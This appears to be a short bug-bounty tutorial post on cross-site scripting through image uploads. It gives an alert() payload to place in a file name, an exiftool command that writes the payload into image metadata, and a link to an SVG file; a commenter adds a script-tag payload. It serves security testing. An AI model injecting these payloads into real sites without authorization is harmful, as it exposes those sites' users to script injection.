XSS IN IMAGE UPLOAD
A full tutorial on exploiting XSS in image upload feature

XSS IN IMAGE UPLOAD

Eman ?ati? Eman ?ati?

Eman ?ati?

I Help People Win in Bug Bounty Hunting ??

发布日期: 2024年1月12日
+ 关注

WHAT IS IT?

Injecting malicious JavaScript code that is executed on a website

WHY IN IMAGE UPLOAD?

Image metadata and rendering is often overlooked by developers, you can inject XSS payloads in image filename & metadata

HOW TO DO IT?

Here are your three general options:

  1. XSS in image nameEx: Upload image with name "><img src=x onerror=alert(1)>.png
  2. XSS in image metadataEx: Add XSS payload in your image payloadCommand: exiftool -Comment='"><img src=x onerror=alert(1)>' IMAGE.pngInstall: https://exiftool.org/install.html
  3. XSS in SVG fileWeb applications often allow SVG upload, use this SVG file:https://gist.github.com/rudSarkar/76f1ce7a65c356a5cd71d058ab76a344


?? Follow my newsletter for more tips on crushing bug bounties in 2024!

?? Contact me: [email protected]

Weekly Bug Bounty Weekly Bug Bounty

Weekly Bug Bounty

3,294 位关注者

订阅
Nagaraj Thangaraj

Front End Developer => JavaScript | React JS | Next JS | Redux |

1 个月

<script> alert (5) </script>
回复

要查看或添加评论,请登录

更多精彩文章

社区洞察

其他会员也浏览了